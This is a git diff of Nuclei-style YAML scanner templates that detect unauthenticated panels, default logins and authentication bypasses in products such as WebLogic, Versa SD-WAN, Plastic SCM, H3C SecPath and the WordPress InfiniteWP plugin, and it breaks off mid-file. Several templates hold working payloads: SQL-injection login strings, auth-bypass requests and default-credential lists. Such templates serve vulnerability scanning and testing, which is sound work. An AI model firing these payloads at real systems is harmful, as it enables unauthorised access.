- https://www.exploit-db.com/ghdb/5808 + tags: config,unauth,prtg +requests: + - method: GET + path: + - "{{BaseURL}}/sensorlist.htm" + matchers-condition: and + matchers: + - type: word + words: + - 'PRTG Traffic Grapher' + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/unauthenticated-zipkin.yaml b/poc/auth/unauthenticated-zipkin.yaml deleted file mode 100644 index 31ddfe3077..0000000000 --- a/poc/auth/unauthenticated-zipkin.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: unauthenticated-zipkin -info: - name: Unauthenticated Zipkin - author: dhiyaneshDk - severity: high - description: Unauthenticated access to Zipkin - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/config.json" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'application/json' - part: header - - type: word - words: - - environment - - defaultLookback - part: body - condition: and diff --git a/poc/auth/unauthenticated-zippkin.yaml b/poc/auth/unauthenticated-zippkin.yaml index 7452622ed4..984ff7a602 100644 --- a/poc/auth/unauthenticated-zippkin.yaml +++ b/poc/auth/unauthenticated-zippkin.yaml @@ -1,23 +1,28 @@ id: unauthenticated-zippkin + info: name: Unauthenticated Zippkin author: dhiyaneshDk severity: high description: Unauthenticated access to Zippkin tags: unauth + requests: - method: GET path: - "{{BaseURL}}/config.json" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'application/json' part: header + - type: word words: - environment diff --git a/poc/auth/unauthorized-h3csecparh-login-10948.yaml b/poc/auth/unauthorized-h3csecparh-login-10948.yaml deleted file mode 100644 index a4d8964e36..0000000000 --- a/poc/auth/unauthorized-h3csecparh-login-10948.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: unauthorized-h3csecparh-login - -info: - name: H3C Server - Unauthenticated Access - author: ritikchaddha - severity: high - description: H3C server was able to be accessed with no authentication requirements in place. - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"H3C-SecPath-运维审计系统" - fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" - tags: h3c,default-login,unauth,misconfig - -http: - - method: GET - path: - - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "admin" - - "审计管理员" - - "错误的id" - condition: and - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100e19e26e61e30b3c2d1af7b9d75514aed59957ba6fbc93d093bba2c639bca2cb00221009542aa31b647b4d6d87b7fc500b996a088dae45909c130f74a4f6a6100f77971:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthorized-h3csecparh-login.yaml b/poc/auth/unauthorized-h3csecparh-login.yaml new file mode 100644 index 0000000000..c5b3c5cc9e --- /dev/null +++ b/poc/auth/unauthorized-h3csecparh-login.yaml @@ -0,0 +1,29 @@ +id: unauthorized-h3csecparh-login +info: + name: H3C Server - Unauthenticated Access + author: ritikchaddha + severity: high + description: H3C server was able to be accessed with no authentication requirements in place. + metadata: + verified: true + shodan-query: http.html:"H3C-SecPath-运维审计系统" + fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" + tags: h3c,default-login,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "admin" + - "审计管理员" + - "错误的id" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/21 diff --git a/poc/auth/unauthorized-hp-printer-10951.yaml b/poc/auth/unauthorized-hp-printer-10951.yaml new file mode 100644 index 0000000000..ef6191d59c --- /dev/null +++ b/poc/auth/unauthorized-hp-printer-10951.yaml @@ -0,0 +1,20 @@ +id: unauthorized-hp-printer +info: + name: Unauthorized HP Printer + author: pussycat0x + severity: high + tags: hp,iot,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/SSI/Auth/ip_snmp.htm" + matchers-condition: and + matchers: + - type: word + words: + - "HP" + - "

SNMP

" + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/unauthorized-plastic-scm-10956.yaml b/poc/auth/unauthorized-plastic-scm-10956.yaml index d004b07584..6d7ae5c71c 100644 --- a/poc/auth/unauthorized-plastic-scm-10956.yaml +++ b/poc/auth/unauthorized-plastic-scm-10956.yaml @@ -1,5 +1,4 @@ id: unauthorized-plastic-scm - info: name: Plastic Admin Console - Authentication Bypass author: DEENA @@ -9,13 +8,10 @@ info: - https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 classification: cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-score: 10.0 cwe-id: CWE-288 - metadata: - max-request: 3 - tags: plastic,misconfig,intrusive - -http: + tags: plastic +requests: - raw: - | GET /account/register HTTP/1.1 @@ -32,7 +28,7 @@ http: - | GET /configuration HTTP/1.1 {{Hostname}} - + cookie-reuse: true extractors: - type: regex part: body @@ -41,15 +37,14 @@ http: name: csrf regex: - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>' - matchers-condition: and matchers: - type: word words: - "Network - Plastic SCM" part: body - - type: status status: - 200 -# digest: 4b0a00483046022100bea1d6873fe7545d710a21e89f24e4e08aac08e44c85065970e57b7e658204b0022100c320ab0788b27b5733e65ab3ebf0c685204cfefb35b31625b0353ed4faa01433:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/23 diff --git a/poc/auth/unauthorized-plastic-scm-10957.yaml b/poc/auth/unauthorized-plastic-scm-10957.yaml deleted file mode 100644 index 6678abb0c6..0000000000 --- a/poc/auth/unauthorized-plastic-scm-10957.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: unauthorized-plastic-scm - -info: - name: Unauthorized Access to Plastic Admin Console - author: DEENA - severity: critical - tags: plastic - reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 - -requests: - - raw: - - | - GET /account/register HTTP/1.1 - {{Hostname}} - - - | - POST /account/register HTTP/1.1 - Host: {{Hostname}} - Origin: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/account/register - Connection: close - - Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false - - - | - GET /configuration HTTP/1.1 - {{Hostname}} - - cookie-reuse: true - extractors: - - type: regex - part: body - internal: true - group: 1 - name: csrf - regex: - - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>' - - matchers-condition: and - matchers: - - type: word - words: - - "Network - Plastic SCM" - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml b/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml new file mode 100644 index 0000000000..dd6e155d1a --- /dev/null +++ b/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml @@ -0,0 +1,20 @@ +id: unauthorized-puppet-node-manager +info: + name: Pupet Node Manager + author: pussycat0x + severity: medium + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,misconfig +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'Nodes' + - type: status + status: + - 200 diff --git a/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml b/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml deleted file mode 100644 index 1e411a7ba4..0000000000 --- a/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: unauthorized-puppet-node-manager - -info: - name: Pupet Node Manager - author: pussycat0x - severity: medium - metadata: - fofa-dork: 'app="puppet-Node-Manager"' - tags: node,misconfig - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Nodes' - - - type: status - status: - - 200 diff --git a/poc/auth/unauthorized-puppet-node-manager-detect.yaml b/poc/auth/unauthorized-puppet-node-manager-detect.yaml index 40d26ed618..1e411a7ba4 100644 --- a/poc/auth/unauthorized-puppet-node-manager-detect.yaml +++ b/poc/auth/unauthorized-puppet-node-manager-detect.yaml @@ -1,15 +1,14 @@ id: unauthorized-puppet-node-manager info: - name: Puppet Node Manager - Unauthorized Access + name: Pupet Node Manager author: pussycat0x severity: medium metadata: - max-request: 1 - fofa-query: 'app="puppet-Node-Manager"' + fofa-dork: 'app="puppet-Node-Manager"' tags: node,misconfig -http: +requests: - method: GET path: - "{{BaseURL}}" @@ -23,5 +22,3 @@ http: - type: status status: - 200 - -# digest: 490a004630440220302dd4f63ddce12168518f0d398d2001b6a88e5bad6b2bdf2c1efa53a3e07bcc022001a50f5a5ae1e1b1c75ecf741ac85fdf3261bb0743c83b20804801e51399ebe7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/versa-default-login-11003.yaml b/poc/auth/versa-default-login-11003.yaml index 5c02c869b2..48d4d86354 100644 --- a/poc/auth/versa-default-login-11003.yaml +++ b/poc/auth/versa-default-login-11003.yaml @@ -1,5 +1,4 @@ id: versa-default-login - info: name: Versa Networks SD-WAN Application Default Login author: davidmckennirey @@ -11,11 +10,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 2 tags: default-login,versa,sdwan - -http: +requests: - raw: - | GET /versa/login.html HTTP/1.1 @@ -27,27 +23,26 @@ http: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&sso=systemRadio - attack: pitchfork payloads: user: - Administrator pass: - versa123 - + cookie-reuse: true + req-condition: true matchers-condition: and matchers: - type: dsl dsl: - 'status_code_2 == 302' - - "contains(tolower(header_2), 'jsessionid')" - - "contains(tolower(header_2), 'location: /versa/index.html')" + - "contains(tolower(all_headers_2), 'jsessionid')" + - "contains(tolower(all_headers_2), 'location: /versa/index.html')" condition: and - - type: dsl dsl: - - "contains(tolower(header_2), '/login?error=true')" - - "contains(tolower(header_2), '/login?tokenmissingerror=true')" + - "contains(tolower(all_headers_2), '/login?error=true')" + - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" negative: true -# digest: 4a0a0047304502201151a2811f7fa9cf424460e96e360bd688ded834b6e0de107bce9fa8acde9631022100c703c221458734a361b21a8cf8a7df830b49541da77ce8b7d04a57d22df72bc8:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/04/06 diff --git a/poc/auth/versa-default-login-11004.yaml b/poc/auth/versa-default-login-11004.yaml index aef0b2dbe9..5c02c869b2 100644 --- a/poc/auth/versa-default-login-11004.yaml +++ b/poc/auth/versa-default-login-11004.yaml @@ -1,11 +1,21 @@ id: versa-default-login + info: name: Versa Networks SD-WAN Application Default Login author: davidmckennirey severity: high - description: Searches for default admin credentials for the Versa Networks SD-WAN application. + description: Versa Networks SD-WAN application default admin credentials were discovered. + reference: + - https://versa-networks.com/products/sd-wan.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 2 tags: default-login,versa,sdwan -requests: + +http: - raw: - | GET /versa/login.html HTTP/1.1 @@ -17,24 +27,27 @@ requests: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&sso=systemRadio + attack: pitchfork payloads: user: - Administrator pass: - versa123 - cookie-reuse: true - req-condition: true + matchers-condition: and matchers: - type: dsl dsl: - 'status_code_2 == 302' - - "contains(tolower(all_headers_2), 'jsessionid')" - - "contains(tolower(all_headers_2), 'location: /versa/index.html')" + - "contains(tolower(header_2), 'jsessionid')" + - "contains(tolower(header_2), 'location: /versa/index.html')" condition: and + - type: dsl dsl: - - "contains(tolower(all_headers_2), '/login?error=true')" - - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" + - "contains(tolower(header_2), '/login?error=true')" + - "contains(tolower(header_2), '/login?tokenmissingerror=true')" negative: true + +# digest: 4a0a0047304502201151a2811f7fa9cf424460e96e360bd688ded834b6e0de107bce9fa8acde9631022100c703c221458734a361b21a8cf8a7df830b49541da77ce8b7d04a57d22df72bc8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/vidyo-default-login-11009.yaml b/poc/auth/vidyo-default-login-11009.yaml deleted file mode 100644 index 670142a941..0000000000 --- a/poc/auth/vidyo-default-login-11009.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: vidyo-default-login -info: - name: Vidyo Default Login - author: izn0u - severity: medium - description: test for default cred super:password - reference: https://support.vidyocloud.com/hc/en-us/articles/226265128 - tags: vidyo,default-login -requests: - - raw: - - | - GET /super/login.html?lang=en HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - | - POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Origin: {{BaseURL}} - Referer: {{RootURL}}/super/login.html?lang=en - Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en - - username={{username}}&password={{password}} - payloads: - username: - - super - password: - - password - attack: pitchfork - extractors: - - type: regex - name: csrf_tkn - group: 1 - part: body - internal: true - regex: - - 'csrf_tkn=([A-Za-z0-9.-]+)' - - type: kval - name: session - internal: true - part: header - kval: - - JSESSIONID - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/super/index.html" - - type: status - status: - - 302 diff --git a/poc/auth/vidyo-default-login.yaml b/poc/auth/vidyo-default-login-11010.yaml similarity index 100% rename from poc/auth/vidyo-default-login.yaml rename to poc/auth/vidyo-default-login-11010.yaml diff --git a/poc/auth/vigor-login-11020.yaml b/poc/auth/vigor-login-11020.yaml new file mode 100644 index 0000000000..8a6f091a0a --- /dev/null +++ b/poc/auth/vigor-login-11020.yaml @@ -0,0 +1,19 @@ +id: vigor-login +info: + name: Vigor Login Page + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6610 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/weblogin.htm' + matchers-condition: and + matchers: + - type: word + words: + - 'Vigor Login Page' + - type: status + status: + - 200 diff --git a/poc/auth/vigor-login-11023.yaml b/poc/auth/vigor-login-11023.yaml deleted file mode 100644 index 03be72a99c..0000000000 --- a/poc/auth/vigor-login-11023.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: vigor-login -info: - name: Vigor Login Page - author: dhiyaneshDK - severity: info - reference: - - https://www.exploit-db.com/ghdb/6610 - tags: panel,login -requests: - - method: GET - path: - - '{{BaseURL}}/weblogin.htm' - matchers-condition: and - matchers: - - type: word - words: - - 'Vigor Login Page' - - type: status - status: - - 200 diff --git a/poc/auth/vigor-login.yaml b/poc/auth/vigor-login.yaml index ce4255d0e0..03be72a99c 100644 --- a/poc/auth/vigor-login.yaml +++ b/poc/auth/vigor-login.yaml @@ -1,33 +1,20 @@ id: vigor-login - info: - name: Vigor Login Panel - Detect + name: Vigor Login Page author: dhiyaneshDK severity: info - description: Vigor login panel was detected. reference: - https://www.exploit-db.com/ghdb/6610 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: panel,login,edb - -http: + tags: panel,login +requests: - method: GET path: - '{{BaseURL}}/weblogin.htm' - matchers-condition: and matchers: - type: word words: - 'Vigor Login Page' - - type: status status: - 200 - -# digest: 4a0a0047304502205205761ed678f220785057ddad4a3470cab519acf994a0f7637965f91815974e022100dede240fe0b532f162e2afb8126aae23440f7b7ecd7fb07f1f0088ea49341e86:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/visionhub-default-login-11026.yaml b/poc/auth/visionhub-default-login-11026.yaml new file mode 100644 index 0000000000..a6ca0e922d --- /dev/null +++ b/poc/auth/visionhub-default-login-11026.yaml @@ -0,0 +1,42 @@ +id: visionhub-default-login + +info: + name: VisionHub Default Login + author: Techryptic (@Tech) + severity: high + description: VisionHub application default admin credentials were discovered. + tags: visionhub,default-login + reference: + - https://www.qognify.com/products/visionhub/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + +requests: + - raw: + - | + POST /VisionHubWebApi/api/Login HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: admin" + part: header + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/13 diff --git a/poc/auth/visionhub-default-login-11027.yaml b/poc/auth/visionhub-default-login-11027.yaml index f7409e95bc..0c32ed33aa 100644 --- a/poc/auth/visionhub-default-login-11027.yaml +++ b/poc/auth/visionhub-default-login-11027.yaml @@ -3,9 +3,15 @@ info: name: VisionHub Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on VisionHub application. + description: VisionHub application default admin credentials were discovered. tags: visionhub,default-login - reference: https://www.qognify.com/products/visionhub/ + reference: + - https://www.qognify.com/products/visionhub/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -27,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/13 diff --git a/poc/auth/vpms-auth-bypass-11066.yaml b/poc/auth/vpms-auth-bypass-11066.yaml new file mode 100644 index 0000000000..342a13243b --- /dev/null +++ b/poc/auth/vpms-auth-bypass-11066.yaml @@ -0,0 +1,33 @@ +id: vpms-auth-bypass +info: + name: Vehicle Parking Management System 1.0 - Authentication Bypass + author: dwisiswant0 + severity: high + reference: https://www.exploit-db.com/exploits/48877 +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Referer: http://{{Hostname}}/login.php + Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 + Connection: keep-alive + Upgrade-Insecure-Requests: 1 + + email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 + matchers-condition: and + matchers: + - type: word + words: + - "LAGOS PARKER" + - "Login Successfully" + - "location.href = 'index.php';" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/auth/vpms-auth-bypass-11068.yaml b/poc/auth/vpms-auth-bypass-11068.yaml deleted file mode 100644 index 2dd06d8a6a..0000000000 --- a/poc/auth/vpms-auth-bypass-11068.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: vpms-auth-bypass -info: - name: Vehicle Parking Management System 1.0 - Authentication Bypass - author: dwisiswant0 - severity: high - description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. - reference: - - https://www.exploit-db.com/exploits/48877 - tags: auth-bypass -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/login.php - Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 - - email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 - matchers-condition: and - matchers: - - type: word - words: - - "LAGOS PARKER" - - "Login Successfully" - - "location.href = 'index.php';" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/auth/watchguard-credentials-disclosure-11107.yaml b/poc/auth/watchguard-credentials-disclosure-11107.yaml index e0258cf0cb..cbaf48e75c 100644 --- a/poc/auth/watchguard-credentials-disclosure-11107.yaml +++ b/poc/auth/watchguard-credentials-disclosure-11107.yaml @@ -1,5 +1,4 @@ id: watchguard-credentials-disclosure - info: name: WatchGuard Fireware AD Helper Component - Credentials Disclosure author: gy741 @@ -9,18 +8,14 @@ info: - https://www.exploit-db.com/exploits/48203 - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 cwe-id: CWE-288 - metadata: - max-request: 1 - tags: watchguard,disclosure,edb - -http: + tags: watchguard,disclosure +requests: - method: GET path: - "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" - matchers-condition: and matchers: - type: word @@ -31,9 +26,8 @@ http: - '"username"' - '"password"' condition: and - - type: status status: - 200 -# digest: 4b0a00483046022100f8e0d27df72b2fe1c8093387e92007e5eadff0eae03e14635e3b39fe8fbb075f022100ed19afcc7b593591a47321f72c10486386adef88bc1291e7383f92e98f0356f9:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/06/03 diff --git a/poc/auth/watchguard-credentials-disclosure-11106.yaml b/poc/auth/watchguard-credentials-disclosure.yaml similarity index 100% rename from poc/auth/watchguard-credentials-disclosure-11106.yaml rename to poc/auth/watchguard-credentials-disclosure.yaml diff --git a/poc/auth/weblogic-weak-login-11154.yaml b/poc/auth/weblogic-weak-login-11154.yaml deleted file mode 100644 index 3cf788b3b9..0000000000 --- a/poc/auth/weblogic-weak-login-11154.yaml +++ /dev/null @@ -1,68 +0,0 @@ -id: weblogic-weak-login - -info: - name: WebLogic Default Login - author: pdteam - description: WebLogic default login credentials were discovered. - severity: high - tags: default-login,weblogic - reference: - - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - -requests: - - raw: - - | - GET /console/ HTTP/1.1 - Host: {{Hostname}} - - - | - POST /console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8 - - attack: pitchfork - payloads: - username: - - weblogic - - weblogic - - weblogic - - weblogic - - weblogic - - admin - - admin - - system - - password: - - weblogic - - weblogic1 - - welcome1 - - Oracle@123 - - weblogic123 - - 12345678 - - security - - password - - stop-at-first-match: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/console/index.jsp" - - "ADMINCONSOLESESSION" - condition: and - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/weblogic-weak-login-11155.yaml b/poc/auth/weblogic-weak-login-11155.yaml index 11d03f834a..454abb185f 100644 --- a/poc/auth/weblogic-weak-login-11155.yaml +++ b/poc/auth/weblogic-weak-login-11155.yaml @@ -1,18 +1,10 @@ id: weblogic-weak-login info: - name: WebLogic Default Login + name: WebLogic weak login author: pdteam - description: WebLogic default login credentials were discovered. severity: high tags: default-login,weblogic - reference: - - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password requests: - raw: - | @@ -57,5 +49,3 @@ requests: - type: status status: - 302 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/whm-login-detect.yaml b/poc/auth/whm-login-detect.yaml index f775e034eb..d6050e6b3a 100644 --- a/poc/auth/whm-login-detect.yaml +++ b/poc/auth/whm-login-detect.yaml @@ -1,19 +1,33 @@ id: whm-login-detect + info: - name: WHM Login Detect + name: WHM Login Panel - Detect author: pussycat0x severity: info - reference: https://www.exploit-db.com/ghdb/7128 - tags: whm,panel,login -requests: + description: WHM login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/7128 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: edb,whm,panel,login + +http: - method: GET path: - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word words: - "WHM Login" + - type: status status: - 200 + +# digest: 4a0a0047304502207711c44e3c1405bc8ba5366c37fa1f888e17c98be33776c5f754c0181a0bce8c022100db98959e59176b58756868b13dce8deb60096e0190a226805f3a3800cdae3424:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/wifisky-default-password-11205.yaml b/poc/auth/wifisky-default-password-11205.yaml deleted file mode 100644 index ece1a116da..0000000000 --- a/poc/auth/wifisky-default-password-11205.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: wifisky-default-password - -info: - name: Wifisky Default Password - author: pikpikcu - severity: high - tags: default-login,wifisky - -requests: - - raw: - - | - POST /login.php?action=login&type=admin HTTP/1.1 - Host: {{Hostname}} - Accept: */* - X-Requested-With: XMLHttpRequest - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Connection: close - - username=admin&password=admin - - matchers-condition: and - matchers: - - - type: word - words: - - "text/html" - part: header - - - type: word - words: - - '"success":"true"' - - '"data":' - part: body - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/auth/wifisky-default-password.yaml b/poc/auth/wifisky-default-password.yaml index 96ffa805aa..58c4881478 100644 --- a/poc/auth/wifisky-default-password.yaml +++ b/poc/auth/wifisky-default-password.yaml @@ -1,21 +1,14 @@ id: wifisky-default-password - info: name: Wifisky Default Password author: pikpikcu severity: high tags: default-login,wifisky - requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 - - raw: + - raw: - | POST /login.php?action=login&type=admin HTTP/1.1 - Host: {{Subdomains}} + Host: {{Hostname}} Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 @@ -24,19 +17,16 @@ requests: username=admin&password=admin matchers-condition: and matchers: - - type: word words: - "text/html" part: header - - type: word words: - '"success":"true"' - '"data":' part: body condition: and - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml b/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml index c48d37c9e4..88121a97b7 100644 --- a/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml +++ b/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml @@ -1,40 +1,25 @@ id: wordpress-infinitewp-auth-bypass - info: name: WordPress InfiniteWP Client Authentication Bypass author: princechaddha severity: critical reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ tags: wordpress,auth-bypass,wp-plugin - requests: - raw: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 - Connection: close - - | POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} - redirects: true - extractors: - type: regex name: username @@ -43,7 +28,6 @@ requests: part: body regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?" - part: body - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml b/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml deleted file mode 100644 index ee41aa1a81..0000000000 --- a/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: wordpress-infinitewp-auth-bypass -info: - name: WordPress InfiniteWP Client Authentication Bypass - author: princechaddha - severity: critical - reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ - tags: wordpress,auth-bypass,wp-plugin -requests: - - raw: - - | - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - Connection: close - - | - POST / 